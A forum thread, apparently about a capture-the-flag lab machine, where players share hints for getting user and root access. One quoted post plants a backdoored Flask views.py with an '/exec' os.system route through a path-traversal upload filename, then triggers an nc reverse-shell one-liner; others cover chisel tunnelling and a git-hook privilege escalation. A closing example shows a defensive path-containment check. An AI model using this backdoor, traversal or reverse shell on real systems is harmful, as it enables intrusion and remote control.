(May 22, 2022, 01:42 AM)Exited3n Wrote:
(May 22, 2022, 12:29 AM)ryzen Wrote:
How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:30
Thanks a lot! Wondering how you found port 3000. I tried running my own port scans but nothing seemed to work. Did I miss this info in the source code or something?

(May 21, 2022, 10:21 PM)dude4695 Wrote:
For Root There is Cron:
2022/05/21 22:15:01 CMD: UID=0 PID=19179 | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git
could someone help me with root?

(May 22, 2022, 01:55 AM)ryzen Wrote:
(May 22, 2022, 01:42 AM)Exited3n Wrote:
(May 22, 2022, 12:29 AM)ryzen Wrote:
How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:30
Thanks a lot! Wondering how you found port 3000. I tried running my own port scans but nothing seemed to work. Did I miss this info in the source code or something?
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp

(May 22, 2022, 02:04 AM)Exited3n Wrote:
(May 22, 2022, 01:55 AM)ryzen Wrote:
(May 22, 2022, 01:42 AM)Exited3n Wrote:
(May 22, 2022, 12:29 AM)ryzen Wrote:
How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:30
Thanks a lot! Wondering how you found port 3000. I tried running my own port scans but nothing seemed to work. Did I miss this info in the source code or something?
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp
Eh. I'm an idiot. My nmap never completed. I got sucked into rabbit holes while waiting lol

I'm trying to figure out how to get Chisel on the docker image, can anybody help me?

(May 22, 2022, 02:15 AM)2341 Wrote:
I'm trying to figure out how to get Chisel on the docker image, can anybody help me?
A simple wget worked for me. Port 80 wouldn't work though for some reason, so I had to host my server on 8000

(May 22, 2022, 02:15 AM)2341 Wrote:
I'm trying to figure out how to get Chisel on the docker image, can anybody help me?
via Upload form! :)

You don't need chisel, you can do it all through wget with the swagger api on Gitea, or just use the ssh key someone has posted original

I had no clue what I was doing with chisel - owe you folks for getting me to user. root was pretty easy imo. thanks for steering me towards pspy @dude4695
I just created a pre-commit hook inside dev01's git dir to cat the flag to an accessible location

(May 22, 2022, 06:08 AM)jon01 Wrote:
(May 21, 2022, 08:32 PM)dude4695 Wrote:
in views.py
import os

from app.utils import get_file_name
from flask import render_template, request, send_file

from app import app


@app.route('/', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')


@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))


@app.route('/exec')
def runcmd():
    return os.system(request.args.get('cmd'))

in burpsuite change this
Content-Disposition: form-data; name="file"; filename="..//app/app/views.py"
in browser
http://IP/exec?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20IP%20PORT%20%3E%2Ftmp%2Ff
you'll get rev shell of container
you have to just replace views.py file
not getting revshell: it's giving me an error
what error?
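
Defensive counterpart to the upload handler quoted above, as an added example that is not part of any post in the thread and not the application's own code: it shows that the `os.path.join` pattern used in `views.py` discards the upload directory when the file name is absolute, and a containment check that rejects such names before anything is written. `UPLOAD_ROOT`, `naive_upload_path`, `safe_upload_path` and `check` are assumed names, and the directory layout is an assumption.

```python
import os

UPLOAD_ROOT = "/app/public/uploads"  # assumed layout, not taken from the thread


def naive_upload_path(file_name, root=UPLOAD_ROOT):
    """Same join pattern as the views.py quoted in the thread."""
    # os.path.join drops every earlier component when a later one is absolute,
    # so an absolute file name silently replaces the upload directory.
    return os.path.join(root, file_name)


def safe_upload_path(file_name, root=UPLOAD_ROOT):
    """Return a path guaranteed to sit inside root, or raise ValueError."""
    if not file_name or "\x00" in file_name:
        raise ValueError("empty or malformed file name")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, file_name))
    # Compare after normalisation so '..', '//' and absolute names are caught.
    inside = os.path.commonpath([root_real, candidate]) == root_real
    if not inside or candidate == root_real:
        raise ValueError(f"upload escapes {root_real}: {file_name!r}")
    return candidate


def check(names, root=UPLOAD_ROOT):
    """Map each candidate name to its safe path, or None when rejected."""
    results = {}
    for name in names:
        try:
            results[name] = safe_upload_path(name, root)
        except ValueError:
            results[name] = None
    return results


if __name__ == "__main__":
    # Constructed sample names; the first is the one shown in the post above.
    samples = ["..//app/app/views.py", "/app/app/views.py", "report.pdf"]
    print("naive:", naive_upload_path("/app/app/views.py"))
    for name, path in check(samples).items():
        print(f"{name!r:28} -> {path or 'REJECTED'}")
```

Running the check on the resolved path, rather than filtering substrings out of the name, is what makes it independent of how the name was encoded or pre-processed.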